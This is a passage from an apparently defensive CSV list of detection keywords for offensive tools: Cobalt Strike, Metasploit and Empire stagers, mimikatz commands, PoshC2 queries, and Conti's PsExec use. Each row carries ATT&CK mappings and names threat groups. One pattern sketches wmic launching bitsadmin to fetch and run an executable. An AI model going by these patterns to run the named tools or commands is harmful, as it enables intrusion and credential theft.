APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*stager_bind_tcp*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*stager_hidden_bind_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*stager_sock_find.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*stagers/*/aes.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/diffiehellman.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/get_sysinfo.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/rc4.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Stagers\ExeStager\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Stagers\SvcStager\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*stagerx64.bin*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 
- T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*standard::answer*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::base64*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::cd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::cls*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::coffee*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::exit*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::hostname*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::localtime*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::log*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::sleep*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::version*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standin --asrep*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --dc*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --delegation*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --group *Domain Admins*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --object *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --spn*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a 
proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StarFighters*,offensive_tool_keyword,StarFighters,A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017,T1059 - T1055 - T1218 - T1027,TA0002 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/StarFighters,1,0,N/A,N/A,4,320,66,2017-06-05T19:18:38Z,2017-06-05T18:28:22Z -*Starkiller*,offensive_tool_keyword,Starkiller,Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.,T1105 - T1210 - T1059 - T1027 - T1035,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,C2,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,10,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*StarkillerSnackbar.vue*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*staroffice2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Start Menu\Programs\Startup\Loader.exe*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*start PsExec.exe -d *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. 
Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*start stinger ,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,0,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *,greyware_tool_keyword,wmic,WMIC suspicious transfer ,T1105 - T1041 - T1048,TA0002 - TA0003 
